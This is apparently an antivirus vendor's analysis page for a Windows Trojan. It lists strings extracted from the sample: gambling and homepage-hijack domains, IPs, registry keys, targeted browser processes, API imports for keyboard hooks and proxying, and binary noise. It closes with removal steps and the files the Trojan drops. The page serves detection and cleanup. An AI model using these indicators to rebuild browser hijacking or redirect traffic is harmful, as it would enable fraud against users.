*hg[0-9][0-9][0-9][0-9][0-9][0-9].com*
*VVV.ra[0-9].com*
*VVV.ra[0-9][0-9].com*
*VVV.ra[0-9][0-9][0-9].com*
*ra[0-9][0-9][0-9][0-9].com*
*js[0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9][0-9][0-9].com*
*VVV.xpj[0-9][0-9].com*
*xpj[0-9][0-9][0-9].com*
*xpj[0-9][0-9][0-9][0-9].com*
*xpj[0-9][0-9][0-9][0-9][0-9].com*
*bet[0-9][0-9][0-9].com*
*bet[0-9][0-9][0-9][0-9].com*
VVV.baidu.com/favicon.ico
VVV.hao123.com/favicon.ico
.com/favicon.ico
üda%
ieadd.adkuai8.com
index.jj123.com.cn
index.hao2016.net
hao.169x.cn
169x.cn
VVV.qidiannet.cn
ok.32wb.com
wbspdh.wicp.net
netbar.6-6.cn
42.62.30.180
dwz.cn
VVV.9973.com
9973.com
61.160.250.4
VVV.msn.com
msn.com
VVV.baiduso.com
baiduso.com
index.114wb.net
114wb.net
123.yhkj9.com
index.58toto.com
ieadd.uc916.com
uc916.com
VVV.apyw.net
VVV.aiwbnet.net
VVV.yaojyw.net
VVV.gt18z.com
union.17lot.com
17lot.com
VVV.v6669.cn
index.icafevip.com
www1.7899987.com
7899987.com
0.baidu.com
VVV.52daohang.com
52daohang.com
index.56wanyx.win
56wanyx.win
VVV.369k.net
227237.com
desk.nmenu.cn
nmenu.cn
yuanyang.d9media.cn
VVV.826826.com
web.sogou.com
123.161gg.com
go.microsoft.com
VVV.114la.com
114.huo99.com
m.browser.baidu.com
index.51wanyx.net
51wanyx.net
index.52icafe.com
52icafe.com
VVV.19so.cn
bmywm.com
interface.wx-media.com
wx-media.com
index.iwb110.com
iwb110.com
17huohu.com
i.17huohu.com
i.firefoxchina.cn
cn.hao123.com
VVV.so26.com
VVV.560560.com
www1.baidu.com
VVV.wz58.com
2345n.sogoulp.com
index.icafe66.com
VVV.jlshoping.com
VVV.hnshoping.com
cn.msn.com
VVV.bmywm.com
wb.soso.com
sogoulp.com
123.5in8.com
hao.5in8.com
VVV.5334.com
daohang2016.com
pownet.net
42.62.30.180/
dwz.cn/OXHad
d9media.cn
web.sogou.com/?
VVV.hao123.com/?tn=
VVV.baidu.com/?tn=
VVV.baidu.com/index.php?tn=
VVV.baidu.com/home?dsp=netbar&tn=
cn.hao123.com/?tn=
VVV.sogou.com/index.htm?pid=sogou-netb-d
VVV.bmywm.com/sg
hao.360.cn/?src=
hao.360.cn/?
123.sogou.com/?71066-
123.sogou.com/?71084-
123.sogou.com/?71013
123.sogou.com/?71021
123.sogou.com/?71032
VVV.sogou.com/index.htm?pid=sogou-netb-c
VVV.pc918.net
//index.woai310.com/index.htm?
VVV.sogou58.com/31077
VVV.tao123.com
VVV.dh18.com
456.huo99.com
huo99.com
hao123.cdsoso.net
VVV.2345.com
VVV.soso.com/?unc=
VVV.soso.com/wbhp.shtml?unc=
wb.soso.com/?unc=
VVV.soso.com/wbhp.shtml?cid=union.s.wh&unc=q
VVV.youdao.com/n3/?keyfrom=netb.yiyong&vendor=netb.yiyong_
VVV.mhkfc.net
VVV.sogou.com/index.htm?pid=sogou-netb-1
VVV.sogou.com/index.htm?pid=sogou-netb-3
VVV.sogou.com/index.htm?pid=sogou-netb-4
VVV.sogou.com/index.htm?pid=sogou-netb-6
VVV.sogou.com/index.htm?pid=sogou-netb-7
VVV.sogou.com/index.htm?pid=sogou-netb-8
VVV.sogou.com/index.htm?pid=sogou-netb-9
VVV.sogou.com/index.htm?pid=sogou-netb-2e7c
VVV.sogou.com/index.htm?pid=sogou-netb-b
VVV.sogou.com/index.htm?pid=sogou-netb-c20
VVV.2345.com/?
VVV.hao123.com/?tn=96012662_hao_pg
VVV.hao123.com/?tn=96994152_hao_pg
123.sogou.com/?71063-5
VVV.hao123.com/?tn=99123885_hao_pg
VVV.hao123.com/?tn=94287050_hao_pg
VVV.hao123.com/?tn=92823465_hao_pg
VVV.hao123.com/?tn=93908426_hao_pg
VVV.hao123.com/?tn=90567778_hao_pg
hao123.com/?tn=91163052_hao_pg
123.sogou.com/?71069-1004
VVV.baidu.com/s?tn=32
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\dnsset
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\ZWebNds
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\stans
MainProX.exe*5C9389C539DDEAFFA58BF110B8ED8F03
wxpro.dll
Busiwork.dll
swaddresbar.dll
loguser.dll
WxVSafe.dll
lolhelper.dll
wxcore.dll
rmserver.exe
exploren.exe
services.exe
lexplore.exe
fbrowser.exe
qqbrowse.exe
360chrom.exe
TaBrowse.exe
Explore.exe
taskmgr.exe
tasklis.exe
Service.exe
NOTEPAD.EXE
control.exe
conhost.exe
clipbrd.exe
command.com
comhost.exe
comtrol.exe
taskmur.exe
Explone.exe
Servlce.exe
contool.exe
connost.exe
fbrowse.exe
Browser.exe
Firefox.exe
lsans.exe
cacis.exe
clsvc.exe
netst.exe
xuean.exe
Brows.exe
Sogou.exe
lleba.exe
ADMon.exe
Chrom.exe
csrss.exe
baidubrowser.exe
2345Explorer.exe
liebao.exe
Maxthon.exe
TheWorld.exe
TaoBrowser.exe
7chrome.exe
FastIE.exe
350chrome.exe
ttraveler.exe
MiniIE.EXE
VVV.hao123.com
VVV.baidu.com
hXXps://123.sogou.com/?71163-0897
71163-0897
h88eg.com
w11e2.com
8e789.com
daben08.com
88jt66.com
029zhuangshi.com
VVV.ag983.com
307858.com
shgw123.com
00003801.com
95990011.net
66bcdf.com
glyn88.com
game88city.com
clever-china.com
sqzl99.com
cmp8d.com
80651.com
0512bgy.com
0756sys.com
pj3516.com
jinleyigou.com
727330.com
emai60.com
mmxx55.com
jkgdq.com
VVV.bmw9.com
aaa01234.com
0008109.com
5556163.com
dh2665.com
ifeng888896.com
VVV.bxchc.com
VVV.bxcho.com
VVV.bxchp.com
hgw1109.com
ty1400.com
ylg6696.com
jkgqs.com
66.133.87.55
jkgqm.com
25175704.com
gdhzxd.com
VVV.4616.com
VVV.4707.com
jkgqt.com
VVV.ay039.com
lkj9875.com
w6603.com
jkhhq.com
wxc7700.com
x33138.com
xbao99.com
9599110.com
9599hh.net
x993.com
zz402.com
f402.com
58757.com
173.255.138.123
youyou456.com
VVV.jkhwq.com
9599mm.net
cqgj0.com
xbyl345.com
tbet88.com
y33138.com
VVV.itb66.com
xinbao169.com
qiangui666.com
yuebet188.com
hao555666.com
pp88086.com
ay159.com
860923.top
85850z.com
VVV.665252.com
nbboard.com
heshangmeng.net
s88ab.com
qy8100.com
VVV.bb868.com
VVV.bo7727.com
2130.qg790.com
bwin2020.com
vic76.com
jiuwuzhizun11.com
95zz00.com
jwzzgw4.cc
882828.net
jjxieqiaoxx.com
9599333.com
VVV.565.net
yuefabo.com
ylg6266.com
VVV.mf9999.com
VVV.yh478.net
29salon.com
VVV.478001.com
478vip.com
VVV.48111.com
my63303.com
VVV.88928.com
VVV.21222.com
bogou888.com
VVV.31999.com
tycjt1.com
long772.com
VVV.63365.com
VVV.656995.com
VVV.3505.com
VVV.2138s.com
jin3388.com
xam31999.com
ty1299.com
VVV.145a.com
www-57365.com
VVV.880ms.com
555050.com
ylg2299.com
886868.net
59bo.cc
dh5524.com
95996666.net
VVV.0008.com
xinyu588.com
VVV.8-88d.com
9000402.com
moca777.com
VVV.itb88.com
yo86567.com
111f11.com
www-23456.com
jwzzgw.cc
jiuwuzhizun11.cc
tbbet8888.com
zr88a.cc
aygj77.com
VVV.s138x.com
js00697.com
qwe654.com
VVV.aygj5.com
aoyayule.com
VVV.ay741.com
yo84756.com
haomatang.com
2221402.com
vns255.com
VVV.x6168.com
shangshangchuanmei.com
k178.vcevv.cn
weebly.com
gdzfcn.com
tbfastfast888.com
ty443.com
js9980.com
VVV.shhbm.com
wns707.com
VVV.7999.cc
ylg2099.com
86666.8994.com
aoya113.com
fa97463.com
VVV.ay951.com
VVV.farmer.com.cn
score.365rich.cn
VVV.8ff77.com
0316ga.com
600.cc
VVV.88jt.net
dafabet.com
VVV.ccav5.com
arsenal.com.cn
VVV.2246.com
88jt88.com
28365365.com
VVV.7m.cn
VVV.9599aa.com
VVV.yl8886.com
bwin0055.com
yzc178.com
VVV.ca88.com
wofacai.com
jiuwuzhizun6.cc
uu11.cc
1p111.com
jwzzgw2.com
VVV.88jt.cc
95zz44.com
df011.com
95990777.net
anyaoying.com
2p222.com
95zz88.com
dafa888.asia
jiuwuzhizun6.com
95zz08.com
517888.net
95992828.cc
VVV.jxhu.com
VVV.cmp8.com
VVV.9178b.com
long8.cc
b1888.cc
95992828.net
biz5.sandai.net
VVV.tycyyy.com
ylg8838.com
yzc363.com
chunv55.com
VVV.9177b.com
yusheedu.com
dafa888.com
VVV.hllzsxa.com
dy7777.com
VVV.6625ss.com
xiudu868.com
95995858.cc
95998888.cc
xin1946.com
qiangui678.com
jwzzgw6.com
95zz11.com
885858.cc
yz188.com
VVV.hfyj.net
VVV.91ent.com
ad.148021.com
yzc262.com
95993838.cc
VVV.ca881.com
5555.ht
VVV.58js.com
aobo8.net
VVV.b138.cc
VVV.cr1118.com
VVV.df888.com
VVV.dfbet.com
VVV.dfbet.net
VVV.y8.cc
VVV.y9.cc
VVV.yxlm.cc
VVV.tyc.com
VVV.vn66.com
VVV.w88.com
hgbet222.com
VVV.m99.com
VVV.mg.cc
dafa888.cm
gcgc915.com
hailifang.com
hg0088.com.so
hg0088.net
hga8800.com
hgw025.com
jsc9988.com
s8s.cc
5060001.com
2055aaa.com
VVV.m402.com
VVV.660022.com
95990044.cc
1bet999.com
ad.050122.com
88jt03.com
VVV.9599gg.com
1006163.com
dy8811.com
px0311.com
9911tyc.com
ty442.com
amws1199.com
yrmt168.com
jwzzgw6.cc
0006163.com
VVV.ay017.com
88jt33.net
zuijiabo.com
VVV.y9.tt
95993838.net
VVV.s138y.com
dafa91.cn
tongbo8888.com
51taotaoyou.com
VVV.ll-49.com
vip1922.com
050ab29.com
9882011.com
w88wap.com
63bdg.com
47.89.30.97
5345yy.com
yzc1188.com
VVV.111146.com
9927qqq.com
b365444.com
aygj587.com
hb3333.com
ddh111.com
9599qq.com
9599112.com
taotietem.com
95996868.cc
9955sbd.com
hainei.org
95996868.com
yl882288.com
6677.us
yinhemmm.com
VVV.478009.com
qpl777.com
ylg8999.com
VVV.365445.com
aibo68.com
w88top.com
aobo00.com
8800y9.com
hd9599.com
VVV.56666.net
ji586987.com
95993333.cc
milan86.com
ylg9099.com
blm0000.com
VVV.bmw7.com
VVV.ca151.com
ad.517dapai.com
59bo.com
VVV.b22138.com
VVV.4662.com
VVV.23456.com
VVV.anhui365.net
ylg9999.com
newbet6.com
VVV.mg123.cm
tlc187.com
VVV.sdw11.com
dhy0022.com
991991.cc
VVV.mr007.com
yo56378.com
fa74955.com
VVV.0177.com
6767385.com
9663553.com
youle44.com
cate.syd.com.cn
feibodr111.com
usot399555.cn
88jt09.com
y8b88.com
006yth.com
0112828.com
VVV.0951wx.com
VVV.187203.com
1hgp.com
VVV.224499.com
3067k.com
365bet.mobi
4213333.cc
VVV.61cctv.com
81808188.com
VVV.87top.com
VVV.8edy.com
VVV.8k018.com
VVV.91bcd.com
94bo.net
9910z.com
VVV.am11.com
VVV.bebio.net.cn
VVV.bg33k.com
blr0088.com
boan83.com
VVV.cd-cszs.com
chinabreed.com
VVV.cn-ady.com
VVV.co1860.com
VVV.cqqggqw.com
VVV.cs0759.com
dhy8855.com
dqxswzxd.com
echina365.com
feibo4.com
VVV.fmu8.com
VVV.hi688.net
hjzs888.com
VVV.ht51.com
VVV.j331.com
jin5088.com
jkg1.cc
VVV.kefu68.com
VVV.kl-cti.com
VVV.kur99.com
VVV.meihuale.com
VVV.mngye.com
VVV.mph4.cn
n0178.com
VVV.nxbyjt.com
VVV.pgpop.com
VVV.qoyari.com
VVV.ranshao.com
VVV.safea.gov.cn
sanrasoft.com
VVV.sctv.com.cn
VVV.sopoer.com
VVV.t1889.com
t5252.com
VVV.tjjsd.com
VVV.v524.com
v8293.com
VVV.vic5.com
vtm006.com
VVV.wj880.com
wns0028.com
VVV.xy306.com
yb633.com
ying993.com
VVV.yqjnt.com
www-55977.com
www-80999.com
olog648.top
zcxtzx.com
3040168.com
baitafengshui.com
xhnjt.cc
47.89.59.67
021sjjc.com
wy.92wy.com
99j.com
66169.com
91yidao.com
mishicq.com
8090cqg.com
860580.com
345zx.com
VVV.melaleuca.com.cn
45woool.com
hhgft.com
eachinfo.com
ucbug.com
VVV.44tf.com
haof.44tf.com
sfacg.com
xyxzgw.com
121.41.16.196
941pojie.com
162.212.181.20
93yd.com
haofupk.com
99inf.com
VVV.ssswm.com
s1904.com
99ting.cn
VVV.wowms.com
mc520.com
VVV.wan50.com
VVV.wf998.com
20shopping.com
net.17ycw.cn
1234567edu.com
183.60.197.153
VVV.559u.com
VVV.wg941.com
tg.mshax.com
taitognpump.com
121.40.239.48
52345.cn
921pt.com
52anzu.com
122.224.33.49
xingzhaohao.com
30ok.com
haosf.me
haosf.ws
99s.com
huzu123.com
268pk.cn
520jdwg.com
s.h1995.com
VVV.54dc.com
cqhaobangshou.com
haosf.tv
swufe.net
shutu.cc
54zz.com
markosweb.com
33sf.com
44145.wang
44134.wang
192yx.com
shenqi.com
175sf.com
sf999.com
fu.juyhf.com
2688tc.com
grrfg.com
sf822.com
rxjh45.com
zhaosf.mobi
zhaowoool.com
sewsx.com
015999.com
VVV.93u.com
ditulao.com
sf999.ws
shangjz.com
cydfh.com
zhoupuinc.com
zmdsnjtgw.com
cqw6.com
hangzhou.aliyuncs.com
zlyzpw.com
uu171.com
cuwoool.cn
1778st.com
183.131.85.133
18wanmei.com
72714.wang
9kf.com
bibuzhengrong.com
cq697.com
d34dd.com
dj665.com
kofbobo.net
kongzhifamen.com
wanwan88.com
VVV.97mc.com
VVV.qiqiweb.com
VVV.vivi2.com
wxyongshang.com
zhaokf.com
zhaosf.cc
sf123uu.com
{844D7191-2FEF-4d2b-AB06-718517B0BFC5}
{684EF56E-2FAE-4ed2-BF46-F0440C5BE24F}
C:\Windows\system32\winlogon.exe
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\SysWOW64\wxpolice64.dll
C:\Windows\Explorer.EXE
C:\Windows\system32\SHELL32.dll
C:\Windows\system32\SHLWAPI.dll
C:\Windows\system32\fxsst.dll
C:\Windows\system32\msvcrt.dll
C:\Windows\System32\MMDevApi.dll
C:\Windows\system32\WINMM.dll
C:\Windows\system32\UIAutomationCore.dll
sfc.exe
sort.exe
taskkill.exe
timeout.exe
wininit.exe
xcopy.exe
netsh.exe
notepad.exe
regedit.exe
reg.exe
rundll32.exe
cmd.exe
{60853F8B-2218-49CF-A58D-2561B9550406}
0.0.0.0
TMyIdTCPServerEventCalll
TMyIdUDPServerEventCallU
NTDLL.DLL
$%X,$%X; $%X,$%X; %d KB
.hao123.com
2345.5636lm.com
VVV.baidu.com/
$%X,$%X; $%X,$%X;
123.sogou.com
123abc.dll
TMyCheckOpenUrl
TDRIVER_UrlWatchList
a.baidu.com
c.baidu.com
s.baidu.com
cb.baidu.com
cbjs.baidu.com
sclick.baidu.com
dict.baidu.com
gimg.baidu.com
n.baidu.com
nsclick.baidu.com
picache.baidu.com
share.baidu.com
suggestion.baidu.com
s1.bdstatic.com
vie.baidu.com
play.bat
hXXps://123.sogou.com/?71156-5497
b~~z0%%cz$ik~x$id%
b~~z0%%cz$ndyorc~$ieg%
pWin7Server.exe
KERNEL32.DLL
360Chrome\Chrome\
CacheIE\Content.IE5
Content.IE5
SogouExplorer\Webkit\Default\
Google\Chrome\
Opera\Opera\
application_cache\cache_groups.xml
Mozilla\Firefox\Profiles\
AppData\Local\Microsoft\Windows\
;8=$:$:$;
00-00-00-00-00
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards\
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
SetRegKey Error:
*.lnk
*.url
%d.%d.%d.%d
hinthk.dll
Err HTTPS RHP...
lass.exe
fash.exe
txupd.exe
PPAP.EXE
TENCENTDL.EXE
inflate 1.2.8 Copyright 1995-2013 Mark Adler
-j}g "@n
.NevP
.Jw04
;3 #>6.&
'2, / 0&7!4-)1#
77771111
>=<;:9876543210/.-, *)('&%$#"!
%sNg_[pn
@%C*G:P
W.OdB#zvd
xTh^.ye
}mC•c
:S%9s
%Uv3:
z>.VZ
=\.RT
u{.as>
276!!@~9
wh&%dSh
|R.TX~`x2
x).AK
re%ds
cCc.IG
M{`E>%S
`.iT&~
!y.Fy
pkEY
.YL`f
Œm%
`].eJ
.sj`A
Gr.Bm@j>
p@.glp:
?456789:;<=
!"#$%&'()* ,-./0123
C:\Windows\hlog.txt
2016-11-22
07:46:34
07:46:30
test url...
07:46:31
Lv;AKv.AKv
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegSetKeySecurity
RegQueryInfoKeyA
RegNotifyChangeKeyValue
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
GetWindowsDirectoryA
GetProcessHeap
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
GetProcessHandleCount
shell32.dll
ShellExecuteA
SHFileOperationA
wininet.dll
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
URLMON.DLL
UrlMkGetSessionOption
ADVAPI32.DLL
wsock32.dll
GetExtendedTcpTable
Rpcrt4.dll
OLEACC.DLL
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
IdTCPStream
 IdTCPServer
UrlMon
MyHTTPSProxyRF
0IdHTTPHeaderInfo
<requestedExecutionLevel level="requireAdministrator"/>
((&)))!&$
%)01$$'&,--%
38000=344
1 0 .'7(2':
- /*-( ,''.-!$$$&'(
-( ,''.-!$$$&'(/*) ,*/.)*72-9
, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-,
87\22,-!'
PLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s=Instruction TLB, 4Kb pages, 4-way set associative, 32 entries8Instruction TLB, 4Mb pages, fully associative, 2 entries6Data TLB, 4Kb pages, 4-way set associative, 64 entries5Data TLB, 4Mb pages, 4-way set associative, 8 entries?8KB instruction cache, 4-way set associative, 32 byte line size@16KB instruction cache, 4-way set associative, 32 byte line size78KB data cache 2-way set associative, 32 byte line size916KB data cache, 4-way set associative, 32 byte line size
No help keyword specified.
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalid
Alt  Clipboard does not support Icons/Menu '%s' is already being used by another form
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
SSL status: "%s"
Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
%s is not a valid IP address.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
No command handler found.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No execute handler found.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d

SearchFilterHost.exe_2516:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3884

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Windows\System32\20ed6a\CDClient_EX.sys (125 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (4 bytes)
    C:\Windows\YbfHFk\iAFqcX.dll (15859 bytes)
    C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (290 bytes)
    C:\Windows\CLOG.txt (87 bytes)
    C:\Windows\YbfHFk\NLVhhEmUa.tmp (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
    C:\Windows\YbfHFk\DvMtvJIVG.dll (279 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
    C:\Windows\xEQSlj.dll (11 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
    C:\Windows\hlog.txt (981 bytes)
    C:\Windows\inplMsoI.dll (13 bytes)
    C:\ProgramData\prjNVt\86ae56633941c20e9a65a719b5a2208.exe (7930 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now